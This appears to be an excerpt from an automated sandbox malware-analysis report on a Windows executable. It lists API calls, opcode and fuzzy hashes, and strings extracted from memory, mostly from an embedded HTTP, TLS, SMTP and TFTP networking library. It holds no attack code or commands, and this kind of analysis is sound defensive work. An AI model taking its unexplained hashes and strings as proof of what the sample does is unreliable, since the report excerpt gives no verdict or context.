                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: AddressCertHandleModuleNameProcString
                    • String ID: 2.5.29.17$schannel: CertFindExtension() returned no extension.$schannel: CryptDecodeObjectEx() returned no alternate name information.$schannel: Empty DNS name.$schannel: Not enough memory to list all hostnames.$schannel: Null certificate context.$schannel: Null certificate info.
                    • API String ID: 4138448956-4204188966
                    • Opcode ID: 31a81374fe475fb18e482c13072433154e8a010969dd2f00a420c495b7635f9d
                    • Instruction ID: 7c6b41f25c781c98755ec685d07a6ef945af22fd06f0117a9c8c6a978f84ce4e
                    • Opcode Fuzzy Hash: 31a81374fe475fb18e482c13072433154e8a010969dd2f00a420c495b7635f9d
                    • Instruction Fuzzy Hash: C161B322B0864286E714AB54D4003B9BBA0FB95B94F944139DE7E877D4DFBCD885C7A0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _vfwprintf_l
                    • String ID: -----END PUBLIC KEY-----$ public key hash: sha256//%s$-----BEGIN PUBLIC KEY-----$;sha256//$Z$Z$sha256//
                    • API String ID: 1692953108-1456817947
                    • Opcode ID: 881d280bd280b3b4bceace73ffbff585b8d3042f5e10cee0b85b02c8c623d9d0
                    • Instruction ID: 5f3058f047a493b2164ea82b873f591501a8b93ff6d49dad0eacc6f404321681
                    • Opcode Fuzzy Hash: 881d280bd280b3b4bceace73ffbff585b8d3042f5e10cee0b85b02c8c623d9d0
                    • Instruction Fuzzy Hash: 42A1C321B0C74282FB14BF91A45037AD692AF49BE4F880035DD6D877D6EFBDE54483A4
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: sendto
                    • String ID: Received last DATA packet block %d again.$Received unexpected DATA packet block %d, expecting block %d$Timeout waiting for block %d ACK. Retries = %d$tftp_rx: internal error
                    • API String ID: 1876886790-2691569196
                    • Opcode ID: bde2f230d248fa6f7c5c63bf81ab7ab36f0c8e8e2bf012c96856f5cc82624816
                    • Instruction ID: 79b4aca46be01e4b6043687ced1b62ea06fef2082969df0a48a4f70af9251bf8
                    • Opcode Fuzzy Hash: bde2f230d248fa6f7c5c63bf81ab7ab36f0c8e8e2bf012c96856f5cc82624816
                    • Instruction Fuzzy Hash: F8919072608AC1C5D761DF29D8443A97BA0EB88F98F44803ADE5D8B3A8DF78D545C760
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Crypt$Hash$Context$ParamRelease$AcquireCreateDataDestroy
                    • String ID: @
                    • API String ID: 1945989244-2766056989
                    • Opcode ID: 19c3bd699b459af425bc2cb279aba6aeae0e93eaeee79a9fd5b500243dee1a8f
                    • Instruction ID: 785e2a981228199dd44b466fc9d4f200074d12ac7d48b51e948a16acbc881609
                    • Opcode Fuzzy Hash: 19c3bd699b459af425bc2cb279aba6aeae0e93eaeee79a9fd5b500243dee1a8f
                    • Instruction Fuzzy Hash: A9319026B1C68587EB609F61A45462AF3A0FFC8B80F805039EA9E47A98CF7DD4058B50
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID: %u/%d/%s$Allowing DoH to override max connection limit$NTLM picked AND auth done set, clear picked$NTLM-proxy picked AND auth done set, clear picked$No connections available in cache$No connections available.$No more connections allowed to host$Re-using existing connection with %s %s$anonymous$ftp@example.com$host$proxy
                    • API String ID: 0-2902238462
                    • Opcode ID: 0d6909ed43f0c5169130c18b1ed6fd7ff846c47aa53a5bd75b8f320cae4069d0
                    • Instruction ID: bda0086999d7f5f8ac99ebe22cf9f4ca02b7c8e800a90f6303c33b5b73cc0165
                    • Opcode Fuzzy Hash: 0d6909ed43f0c5169130c18b1ed6fd7ff846c47aa53a5bd75b8f320cae4069d0
                    • Instruction Fuzzy Hash: DF42B122A087C285EB51EFA194507FCA7A4EF45B98F894036CE6D8B3D5DFB8D544C3A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID: (in redirect)$%s://%s$Protocol "%s" %s%s$Switched from HTTP to HTTPS due to HSTS => %s$Too long hostname (maximum is %d)$URL rejected: %s$disabled$file$http$https$not supported
                    • API String ID: 0-2601942094
                    • Opcode ID: f13a9d90e823b9bdb2e1ddc3be97899f4d48ef658dc787749694039583c6e433
                    • Instruction ID: fe9209c7db3eabc3b3dbba2a2b393b865187732932141638a630862da11a456c
                    • Opcode Fuzzy Hash: f13a9d90e823b9bdb2e1ddc3be97899f4d48ef658dc787749694039583c6e433
                    • Instruction Fuzzy Hash: 4212B332B0868392FB58AAA995543F9A694FF45B50FC44036DB6DC76C1DFBCE520C3A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID: AUTH=$ SIZE=$ SMTPUTF8$%lld$<%s>$<%s@%s>$MAIL$MAIL FROM:%s%s%s%s%s%s$Mime-Version$Mime-Version: 1.0$state change from %s to %s
                    • API String ID: 0-2592802878
                    • Opcode ID: ca17d0a8c02d089f7a46fdc6780435cae035b93c23eb9a914159671ddadb30a1
                    • Instruction ID: 7fb589eab9d9117fc2e8777e7570356dba6e8fa3caad7b0fcac3f7954504e80a
                    • Opcode Fuzzy Hash: ca17d0a8c02d089f7a46fdc6780435cae035b93c23eb9a914159671ddadb30a1
                    • Instruction Fuzzy Hash: 75E19E62B08A4286FF55BB61E4202B9B3A0EF45B94FC44135ED6D866D1EFBCE504C3A0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
                    • String ID: @
                    • API String ID: 3606780921-2766056989
                    • Opcode ID: 6ec95521a9f1253f2e0b5427e519efae6c14c2ba02baa511e5147bf8191f6905
                    • Instruction ID: f8ca223dae127538040d48ab83c55901433bc23d77940be6e16442338f9804d7
                    • Opcode Fuzzy Hash: 6ec95521a9f1253f2e0b5427e519efae6c14c2ba02baa511e5147bf8191f6905
                    • Instruction Fuzzy Hash: 9431A22670868183EB50EF65E54066AEBA0FFC8B90F844035EB8E57B94CF3CD045DB54
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Crypt$Context$Release$AcquireDestroyEncryptImport
                    • String ID: @
                    • API String ID: 3016261861-2766056989
                    • Opcode ID: 3cae7e76ca43f66747581ad8ed83d0bd808e6ce8b4ed0286606008c693e6c089
                    • Instruction ID: 853116139e139c7b38bb811610d52931201b3d4e4442fda18c5e76a73eb18125
                    • Opcode Fuzzy Hash: 3cae7e76ca43f66747581ad8ed83d0bd808e6ce8b4ed0286606008c693e6c089
                    • Instruction Fuzzy Hash: 7541B066B046908EF7109BB5D4503EE7BB1FB46348F444025DEAD53A89CB3CD11AE760
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID: Clear auth, redirects scheme from %s to %s$Clear auth, redirects to port from %u to %u$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s$The redirect target URL could not be parsed: %s
                    • API String ID: 0-2860807360
                    • Opcode ID: 1fee2508a4bdf2394bbf3f956df8516a859dc8e2df2edc9574a9393f47443514
                    • Instruction ID: 52407c8008ab6140fe0a8eeb5709a8d43c5de9071bddd7283413e58568f4f6fc
                    • Opcode Fuzzy Hash: 1fee2508a4bdf2394bbf3f956df8516a859dc8e2df2edc9574a9393f47443514
                    • Instruction Fuzzy Hash: FDD1F571B0868381FB64FB79A4606F9A691AF89B84F880035DD6DC76D5DFBCD401C7A0
                    APIs
                      • Part of subcall function 00007FF7F131B1CC: GetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1DB
                      • Part of subcall function 00007FF7F131B1CC: FlsGetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1F0
                      • Part of subcall function 00007FF7F131B1CC: SetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B27B
                    • TranslateName.LIBCMT ref: 00007FF7F132544E
                    • TranslateName.LIBCMT ref: 00007FF7F1325489
                    • GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF7F1314C34), ref: 00007FF7F13254D0
                    • IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF7F1314C34), ref: 00007FF7F1325508
                    • GetLocaleInfoW.KERNEL32 ref: 00007FF7F13256C5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                    • String ID: utf8
                    • API String ID: 3069159798-905460609
                    • Opcode ID: d0acefbe756dc237107251eaf4980a3d70cf4ba222899f163021aefde55179de
                    • Instruction ID: 043298ca79bf774197c79e84e49f7d06f58cf89918913662daac5af1fc1be520
                    • Opcode Fuzzy Hash: d0acefbe756dc237107251eaf4980a3d70cf4ba222899f163021aefde55179de
                    • Instruction Fuzzy Hash: 72919032B0878283EB24BF11A4012F9A3A4EF44B90F855179DA6D577C5DFBCE651C7A0
                    APIs
                      • Part of subcall function 00007FF7F131B1CC: GetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1DB
                      • Part of subcall function 00007FF7F131B1CC: FlsGetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1F0
                      • Part of subcall function 00007FF7F131B1CC: SetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B27B
                      • Part of subcall function 00007FF7F131B1CC: FlsSetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B211
                    • GetUserDefaultLCID.KERNEL32(?,00000000,00000092,?), ref: 00007FF7F1325F9C
                      • Part of subcall function 00007FF7F131B1CC: FlsSetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B23E
                      • Part of subcall function 00007FF7F131B1CC: FlsSetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B24F
                      • Part of subcall function 00007FF7F131B1CC: FlsSetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B260
                    • EnumSystemLocalesW.KERNEL32(?,00000000,00000092,?,?,00000000,?,00007FF7F1314C2D), ref: 00007FF7F1325F83
                    • ProcessCodePage.LIBCMT ref: 00007FF7F1325FC6
                    • IsValidCodePage.KERNEL32 ref: 00007FF7F1325FD8
                    • IsValidLocale.KERNEL32 ref: 00007FF7F1325FEE
                    • GetLocaleInfoW.KERNEL32 ref: 00007FF7F132604A
                    • GetLocaleInfoW.KERNEL32 ref: 00007FF7F1326066
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                    • String ID:
                    • API String ID: 2591520935-0
                    • Opcode ID: 696a505132d357ecb8150663cf8546c47922e71c1ae0f14a8c5cfa5dfe919522
                    • Instruction ID: 745070d88b7ed71cf350eb76ef013daa24fda451ae97bc08fb1e6247f22aacb0
                    • Opcode Fuzzy Hash: 696a505132d357ecb8150663cf8546c47922e71c1ae0f14a8c5cfa5dfe919522
                    • Instruction Fuzzy Hash: B6715B62B186929BFB10BF60D8506FCA3B0BF48B54F844079CA2D536D5DFBCA945C7A0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                    • String ID:
                    • API String ID: 3140674995-0
                    • Opcode ID: e3873d3c8433cafce80df827fa39ed03d0e0d50b90b5499536117554b0a629f6
                    • Instruction ID: 313494725e785daf9ead7544fc8b26bd589871e428191611c5a5f42555b18b1a
                    • Opcode Fuzzy Hash: e3873d3c8433cafce80df827fa39ed03d0e0d50b90b5499536117554b0a629f6
                    • Instruction Fuzzy Hash: 85317E72708B8186EB60AF60E8403EEB360FB84754F84443ADA5E47B98EF7CD548C764
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: EnvironmentVariable
                    • String ID: %s_proxy$ALL_PROXY$NO_PROXY$Uses proxy env variable %s == '%s'$all_proxy$http_proxy$memory shortage$no_proxy
                    • API String ID: 1431749950-4066991793
                    • Opcode ID: 2a47c81a783b4396a59bf2d247ffd8f3b1a8bcc72f4b13286570d74efc1b7c1a
                    • Instruction ID: 63d8e1dd3f653fc3efb25724ff3d8ff608f24c1f9be44f863cc7debcb3dd53ea
                    • Opcode Fuzzy Hash: 2a47c81a783b4396a59bf2d247ffd8f3b1a8bcc72f4b13286570d74efc1b7c1a
                    • Instruction Fuzzy Hash: AAC19222B0978285EB25AFA594143BDA790AF45BA8F890036CE6D473D5DFBCE544C3B0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld
                    • API String ID: 0-3476178709
                    • Opcode ID: 926c7dbe96f46fef2906cb7a578c185fd222e910dad2f2049cd95e2f94ec7f1b
                    • Instruction ID: 45a8831c65694ce23ffc03dd4f2e4872c5f286305ee91f91faee41ef0010d3f5
                    • Opcode Fuzzy Hash: 926c7dbe96f46fef2906cb7a578c185fd222e910dad2f2049cd95e2f94ec7f1b
                    • Instruction Fuzzy Hash: 10216050F4DA8A43FF18EBD5A8107F682605F547A4FC00536EE2E463D29FED6595C2E0
                    APIs
                    Strings
                    • M&S works hard to make better products and shops. They want to sell even more in the next years., xrefs: 00007FF7F128E0F8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn
                    • String ID: M&S works hard to make better products and shops. They want to sell even more in the next years.
                    • API String ID: 3668304517-2797344925
                    • Opcode ID: 141e15260c01d24147758a483f0d9dc38c5add2af1801bd5f521c6e652894aca
                    • Instruction ID: 5d9a2d312e377acfa5b55f7e44bd4c009b217f0ae99ad4bd320ab6721fd4e0a3
                    • Opcode Fuzzy Hash: 141e15260c01d24147758a483f0d9dc38c5add2af1801bd5f521c6e652894aca
                    • Instruction Fuzzy Hash: 88E10823B04B8586EB10EBA5D4402ADB361FB54BA8F444636DE6CA7BD9DF78D481C390
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: FileFindFirst_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 2227656907-0
                    • Opcode ID: bb18d0758a06c4f01855e773e506677ea6795f6f04079887c2e99b598b8666a2
                    • Instruction ID: 4447a2511bbd82515f0e1335edb8864ea6728e79eaee0b35656df51af6df0023
                    • Opcode Fuzzy Hash: bb18d0758a06c4f01855e773e506677ea6795f6f04079887c2e99b598b8666a2
                    • Instruction Fuzzy Hash: 29B10926B186D682EB60FB2196001B9E360EF44BE4F844179ED7D87BC9DFBCE4418390
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Crypt$Context$AcquireCreateHashRelease
                    • String ID: @
                    • API String ID: 4045725610-2766056989
                    • Opcode ID: a2956b10518a7214aa3f749e753e924ed0c318a9c157f36a21e53d8cdd5495dc
                    • Instruction ID: 06a2a0f272c9ada60c7034c5d7c55feefc0473d665240d77d65f31192a6069b6
                    • Opcode Fuzzy Hash: a2956b10518a7214aa3f749e753e924ed0c318a9c157f36a21e53d8cdd5495dc
                    • Instruction Fuzzy Hash: CFF0966AF1061283F7505B75E801766A390EF94B48F844034CE5C867D4DF7CD0969B54
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID: SSPI: could not get auth info$WDigest$digest_sspi: MakeSignature failed, error 0x%08lx$realm$schannel: InitializeSecurityContext failed: %s
                    • API String ID: 0-3841482288
                    • Opcode ID: 2ac1f080fc3d62cedc84a9dd9ade597f284205f3cebe6b502dd35435eae8c97e
                    • Instruction ID: d9303b8fe93f696b3cf82e3c3eab19b7f086c141cf59a84d18fc3715ea499fec
                    • Opcode Fuzzy Hash: 2ac1f080fc3d62cedc84a9dd9ade597f284205f3cebe6b502dd35435eae8c97e
